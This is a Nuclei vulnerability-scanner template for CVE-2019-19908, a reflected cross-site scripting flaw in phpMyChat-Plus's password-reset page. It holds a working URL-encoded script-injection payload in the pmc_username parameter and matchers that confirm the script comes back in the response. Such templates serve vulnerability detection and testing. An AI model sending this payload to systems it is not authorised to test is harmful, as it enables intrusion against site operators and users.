nuclei-templates/cves/2019/CVE-2019-19908.yaml

22 lines
454 B
YAML

id: CVE-2019-19908
info:
name: phpMyChat-Plus XSS
author: madrobot
severity: medium
tags: cve,cve2019,xss
requests:
- method: GET
path:
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1337)</script>"
part: body